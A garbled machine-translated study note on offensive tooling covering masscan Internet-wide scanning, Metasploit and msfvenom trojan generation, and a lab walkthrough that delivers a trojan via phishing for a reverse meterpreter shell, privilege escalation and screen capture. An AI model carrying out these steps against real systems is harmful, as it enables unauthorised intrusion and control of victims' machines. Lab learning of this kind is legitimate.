Masscan

It is said to sweep the Internet in five minutes

Superior performance , Limit speed 1000w/s, Parameters Follow  nmap almost

-p 80,8000-8100 10.0.0.0/24
--max-rate=100000    // The ultimate speed of contracting

masscan 0.0.0.0/0 -p 0-65535     // Scan all ports of the entire Internet

Don't try to .......

Metasploit（msf）

Once there's a loophole , There are ways to exploit vulnerabilities , Will be included immediately —— Fool attack

Early want to exploit vulnerabilities —— Need to know the vulnerability poc and exp

poc： Vulnerability verification script （ It will only tell you that there is a loophole ）

​ log4j：calc

exp： Exploit scripts （ Detailed operation method ）

msf Divided into two parts

msfconsole（ Console ）

msfvenom（ Trojan horse generation platform , One click Trojan horse ）

metasploit v6.1.4-dev                           ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion  

exploite： Exploit , coordination payload

payload： success exp after , Instructions or code executed during the attack , rebound shell, It can also be instructions executed directly in the target system

- singles： All the code is in one file （ Big Trojan horse ）, Will be limited by memory space
- stagers： transmission payload The connection established , Safely put our payload Transfer to target operation （stages）
- stages：stagers Once the connection is established , In the transmitted code （payload）

auxiliary： Auxiliary modules , For information gathering , No, payload Of exp
encoders： Coding module , Yes payload To encrypt , Avoid anti-virus detection

post： obtain shell, Further running attack instructions （ Post penetration ）

nops： Empty command , Play the role of confusion

evasion： No killing , The effect is very good , But it has a time limit , 100% exemption

msfdb（msf database , Storage for information collection ）

msfdb init           Initialize database

service postgresql start       Start database
msfdb run    Automatically enable connecting to the database

db_status         Query whether to connect to the database

hosts、services       Query the scanned data

db_nmap == nmap（ however nmap It will not be stored in the database ）

connect 192.168.111.131 4444  similar nc Gadgets （ Here is the forward connection ）

Be careful ： Initialize database , After starting the database , To restart the console （exit——msfconsole）

use exploit/multi/handler      Monitor module

-info 

-show options      It's all about viewing commands

common payload How to connect
payload：
    bind         positive
    reverse         reverse
    http        80
    https        443

payload Setting mode ：

set payload operating system /[ framework /] terminal / How to connect

 meterpreter      Upgraded version shell

 LHOST —— Local ip        LPORT—— port

complete

run Start listening （ perhaps exploit）

msfvenom

Trojan horse generation platform

-p            Set up payload
-a             framework x64 x86
      --platform     Setting up the platform windows/linux
-e             code
-i             iteration
-f             File format
        -f raw -o 1.apk
        R -o 1.apk
-o             The output file
    >
-l | --list             Details

Be careful ！ Generated payload Want to be with console Set up payload Almost the same

For example, what you monitor is windows Of Trojans , What do you generate linux Of Trojans , Obviously unreasonable

lhost= This machine ip
rhost= The goal is ip

Set above payload As an example , Build a Trojan

Okay , Now comes the crucial question , How to put the Trojan horse on the target plane of the victim ？

The most common method —— go fishing

Quickly open in the current folder http service —— Set up a local web page
python2.7 -m SimpleHTTPServer 8080
python3.9 -m http.server 8080

The target entered the temporary website

Be careful. ,win7 The firewall of the target should be shut down in advance , Otherwise kali unable ping through win7

There is a strange point here , transport http://192.168.111.130:8080/ You can visit , But lose 192.168.111.130:8080 cannot access , It's a little metaphysical .

 kali It will immediately display the page visited ip Address

kali Start listening

The target machine downloads the Trojan horse and runs

kali Get a bounce shell, success ！

shell

shell ctrl_z          shell Put it in the background

sessions              Check the background connection

 sessions -u ID       shell Conversation promotion →meterpreter

meterpreter

meterpreter  bg          Back to the top

information gathering
getuid
getsid

sysinfo
getsystem    One click to lift the right , The failure rate is high , Try full

 run vnc  Direct broadcast

View as a web page     >     live broadcast
screenshare

Commonly used post penetration information collection